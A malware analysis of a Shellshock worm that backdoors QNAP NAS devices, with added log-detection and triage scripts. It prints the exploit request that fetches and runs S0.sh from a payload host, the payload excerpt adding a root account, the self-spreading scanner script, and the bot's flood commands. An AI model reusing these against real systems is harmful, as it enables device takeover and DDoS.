“Armed Qnap-NAS Botnet Revealed”
We present findings in addition to the work in the following analyses.
Worm Backdoors and Secures QNAP Network Storage Devices
https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
Shellshock Worm Exploiting Unpatched QNAP NAS Devices
https://threatpost.com/shellshock-worm-exploiting-unpatched-qnap-nas-devices/109870
A little ShellShock fun
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
This is what we found: the pieces missing from the previous research. As always, our publication is short and to the point.
The attackers send a GET request carrying a Shellshock exploit to IP ranges across the whole Internet. Each successfully exploited NAS is made to download a payload from the Internet: a shell script (S0.sh) with clever logic built specifically for QNAP NAS devices. The script downloads an ELF Linux binary with bot functionality for DDoS. From this point the attacker builds persistence inside the compromised NAS, using an autorun.sh script.

Another interesting finding is that the attacker patches the vulnerable device against Shellshock; by doing so the attacker keeps other attackers from taking over a NAS that is already owned. A device that now passes a Shellshock vulnerability scan is therefore not necessarily clean.

Adding a "request" user with root privileges (UID 0) to the passwd and shadow files is the classic way to own a Linux machine. The real aim of this mass compromise is the "armgH.cgi" binary that the attacker downloads and installs on the compromised machine. This CGI backdoor turns the NAS into an armed device ready for DDoS. The whole attack chain is designed to run continuously, on auto-pilot. So far we have detected more than 500 compromised devices.

[Figure: attack chain. Massive attack -> Deploying payload -> Patching against Shellshock (persistence) -> Arming -> Deploy the scanner]
Details

Attack exploit detected by our IDS devices (the probe as sent, followed by the target's response):

GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :;}; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length: 2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server: (value not captured)
HTTP Status 404 - /cgi-bin/authLogin.cgi   (first line of the HTML error page)

The User-Agent value is the CVE-2014-6271 trigger: a bash function definition "() { :;}" followed by the command that runs when the CGI imports its environment. The command deletes any earlier copy of S0.sh, creates a working directory under /share/HDB_DATA, fetches S0.sh from the payload host and runs it with stdin and stderr tied to stdout, i.e. to the HTTP connection. The fixed Host header shows the request is not tailored to the target. Note also that this captured host answered 404, so it did not serve /cgi-bin/authLogin.cgi at all: the probe is sprayed at every host that answers on the port, QNAP or not.
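The captured probe above is easy to spot in web-server or proxy logs, because the Shellshock trigger is the function-definition prefix "() {" inside a header value. The following shell script is an added example, not part of the original report: it pulls such probes out of Apache-style combined log lines (the sample lines are constructed; the first reuses the request captured above) and extracts the URLs the injected command fetches, which are the payload-host indicators to block and to hunt for in outbound traffic.

```sh
#!/bin/sh
# Added example (not from the original report): find Shellshock probes like the
# one captured above in Apache-style combined logs and pull out the payload URLs.
# The log lines below are constructed; the first reuses the captured request.

SAMPLE_LOG='203.0.113.7 - - [13/Dec/2014:22:09:42 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 2250 "-" "() { :;};/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1"
198.51.100.9 - - [13/Dec/2014:22:10:01 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.3 - - [13/Dec/2014:22:10:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "() { :; }; /usr/bin/wget http://192.0.2.200/x.sh -O /tmp/x.sh"'

# shellshock_hits [file...]: lines carrying the CVE-2014-6271 trigger, a bash
# function definition "() {" inside a header value. The pattern allows the
# spacing variants seen in the wild ("() { :;};", "() { :; };", "() {:;};").
# With no file argument it reads stdin.
shellshock_hits() {
    grep -E '\(\) *\{' "$@"
}

# shellshock_count [file...]: number of such lines.
shellshock_count() {
    shellshock_hits "$@" | grep -c ''
}

# shellshock_urls [file...]: prints "client_ip<TAB>url" for every http(s) URL
# inside an injected command; these are the payload hosts to block and hunt for.
shellshock_urls() {
    shellshock_hits "$@" | awk '{
        ip = $1
        n = split($0, w, /[ "]+/)
        for (i = 1; i <= n; i++)
            if (w[i] ~ /^https?:\/\//) print ip "\t" w[i]
    }'
}

# Stand-alone run over the constructed sample: two hits, two payload URLs.
printf '%s\n' "$SAMPLE_LOG" | shellshock_urls
```

Access logs normally record only the User-Agent, while the trigger can arrive in any header (Referer, Cookie, custom headers), so run the same pattern over full request headers at the IDS or reverse proxy as well. A hit is evidence of a probe, not of a compromise: the device only ran the command if its CGI handler invoked an unpatched bash, so every hit against a QNAP needs a follow-up check on the host itself.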
Payload (hosted on a compromised server)

[Figure: attack stages. Massive ShellShock vulnerability attack -> Deploy the payload -> Patching against ShellShock -> Arming the NAS for DDoS attacks -> Deploy the scanner for ShellShock attack]
S0.sh, the payload script (excerpt as captured: the if blocks are not closed in the capture, and the step that moves armgH.cgi from the .xpl folder into /home/httpd/cgi-bin is missing from it):

#!/bin/sh
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
os=`uname -m`
ip=xxx.14.xx.xx
#wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
#
#
fold=/share/MD0_DATA/optware/.xpl/
if [[ "$os" == 'armv5tel' ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi
mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
sleep 1
Search="request"
Files="/etc/passwd"
if grep $Search $Files; then
echo "$Search user its just added!"
else
echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../"
url69="http://xxx.14.xx.79/run"

What the script does: it unsets the history-related variables so the session leaves no shell history, then checks the CPU architecture and continues only on armv5tel, the ARMv5 QNAP models the ELF payload was built for. The bot binary armgH.cgi is renamed to exo.cgi in the web server's cgi-bin directory with mode 4755 (setuid), so it can be started with a plain HTTP request to /cgi-bin/exo.cgi, and a hidden copy .exo.cgi is kept in the optware .xpl folder. If no "request" account exists yet, one is appended to /etc/passwd with UID 0 and GID 0 and to /etc/shadow with an MD5-crypt hash ($1$...) that has an empty salt, giving the attacker a root login with a password only they know. The script then fetches QNAP's own ShellshockFix_1.0.2 Qfix package into the update directory /mnt/HDA_ROOT/update_pkg/, so the device ends up genuinely patched after the compromise, and finally sets up the scanner (sfolder, url69) that turns the victim into a new attacker.
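A responder who suspects a NAS was hit by S0.sh wants a quick check for what the script leaves behind. The script below is an added example, not part of the original report: it looks for UID-0 accounts other than the built-in root and admin (on QNAP's QTS the admin account is also UID 0), for shadow entries with the empty-salt MD5-crypt format S0.sh appends, for the setuid CGI binary, and for the paths the script writes. The functions take paths as arguments so they can be run on files copied off a device; the passwd and shadow contents below are constructed for the offline demonstration, with the "request" lines taken from S0.sh and the other hashes being placeholders.

```sh
#!/bin/sh
# Added example (not from the original report): triage checks for the traces S0.sh
# leaves on a QNAP NAS. Every function takes an optional path so the same code
# runs on a live device (defaults) or on files copied off it.

# extra_root_accounts [passwd]: UID-0 accounts other than root and admin.
# On QTS the built-in admin account is also UID 0, so only other names are suspect.
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" && $1 != "admin" { print $1 }' "${1:-/etc/passwd}"
}

# empty_salt_hashes [shadow]: accounts whose MD5-crypt hash has an empty salt,
# i.e. the field starts with "$1$$", the shape of the request entry S0.sh appends.
empty_salt_hashes() {
    awk -F: 'index($2, "$1$$") == 1 { print $1 }' "${1:-/etc/shadow}"
}

# dropped_files [root]: which of the paths S0.sh writes exist under root (default "/").
dropped_files() {
    for f in /home/httpd/cgi-bin/exo.cgi \
             /share/MD0_DATA/optware/.xpl/.exo.cgi \
             /mnt/HDA_ROOT/update_pkg/ShellshockFix_1.0.2_20141008_all.bin; do
        [ -e "${1:-}$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# setuid_cgi [dir]: setuid binaries in the CGI directory (S0.sh does chmod 4755).
setuid_cgi() {
    find "${1:-/home/httpd/cgi-bin}" -type f -perm -4000 2>/dev/null
}

# --- constructed demo data: passwd/shadow as they look after S0.sh ran ---
demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT
cat > "$demo/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
admin:x:0:0:administrator:/share/homes/admin:/bin/sh
guest:x:65534:65534:guest:/tmp:/bin/sh
request:x:0:0:request:/share/homes/admin:/bin/sh
EOF
cat > "$demo/shadow" <<'EOF'
root:$1$Xy7pQ2mR$placeholderhashvalue000000:15166:0:99999:7:::
admin:$1$Xy7pQ2mR$placeholderhashvalue000000:15166:0:99999:7:::
request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::
EOF
mkdir -p "$demo/home/httpd/cgi-bin"
: > "$demo/home/httpd/cgi-bin/exo.cgi"
chmod 4755 "$demo/home/httpd/cgi-bin/exo.cgi"

# Stand-alone run against the demo tree: each check reports the "request" traces.
echo "extra UID-0 accounts: $(extra_root_accounts "$demo/passwd")"
echo "empty-salt hashes:    $(empty_salt_hashes "$demo/shadow")"
echo "dropped files:        $(dropped_files "$demo")"
echo "setuid CGIs:          $(setuid_cgi "$demo/home/httpd/cgi-bin")"
```

On a live device call the functions without arguments. The report names autorun.sh as the persistence mechanism but does not show it, so that file has to be reviewed by hand; and because S0.sh installs QNAP's real Qfix, the presence of the ShellshockFix package on an unmanaged device is itself a lead, not a sign that the device is safe.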
Arming the NAS devices for DDoS attacks

armgH.cgi, hosted on a compromised server: an ELF Linux backdoor with an IRC client and DDoS capability.
Output from reverse-engineering analysis (help strings embedded in the binary):
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process

The %s is the printf placeholder for the channel the bot answers in; these lines are the bot's .help output. The command set gives the operator arbitrary command execution on the NAS (.exec), credential-guessing scans of other devices (.advscan with user:pass) plus a scan using the "d-link config reset bug", and SYN/ACK floods with spoofed source addresses, with per-architecture variants for mipsel, arm, ppc, superh and x86. The architecture list shows this is a generic embedded-device bot rebuilt for the ARM QNAP models rather than something written for QNAP; its help text matches that of the publicly available lightaidra IRC bot family. For network detection, look for outbound IRC (NICK/JOIN/PRIVMSG) from a NAS, which has no business talking IRC at all.
Senad Aruch
Senior Security Specialist
senad.aruc@gmail.com |www.senadaruc.com
March, 2014
Screenshot (not reproduced here) from a hacked NAS device: the deployed payload can be controlled through the CGI web backdoor at
http://X.X.X.X:8080/cgi-bin/exo.cgi
Mass scanner for Shellshock

This script was taken from a compromised NAS device. The attacker uses "pnscan", a multi-threaded port scanner, to find and exploit other vulnerable QNAP NAS devices.

#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url=""
url="http://1xx.xx.xx.xx/S0.sh"
download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n"
./pnscan -rQDoc -w"$get" -t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &

How it works: the first octet is drawn at random and the scan covers that whole /8 (the first.0.0.0:255.0.0.0 target form) on port 8080, the QNAP web interface port. pnscan keeps up to 300 connections open at a time (-n300) with a 500 ms timeout (-t500), writes the -w request to every host that accepts the connection, and reports the hosts whose reply contains the -r string; "QDoc" is the start of the XML root element (QDocRoot) that a QNAP authLogin.cgi returns. Because the request is written to every host that answers, the exploit is delivered blindly and the list of matching hosts is simply discarded (> /dev/null). Each victim runs S0.sh and then starts this same scanner, which is what makes the worm self-propagating. Note that RANDOM%255+2 yields values from 2 to 256, so one run in 255 picks an invalid first octet and scans nothing.
About the security researcher

Multiple Certified ISMS Professional with a 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analysis, ISMS and Risk, Ethical Hacking, Vulnerability Management, Anti-Fraud and Cyber Security. Skills include written and verbal communication in 6 different languages.
Currently holding a Senior Security Specialist position at Reply S.p.A. - Communication Valley - Security Operations Center. Responsible for advanced security operations.
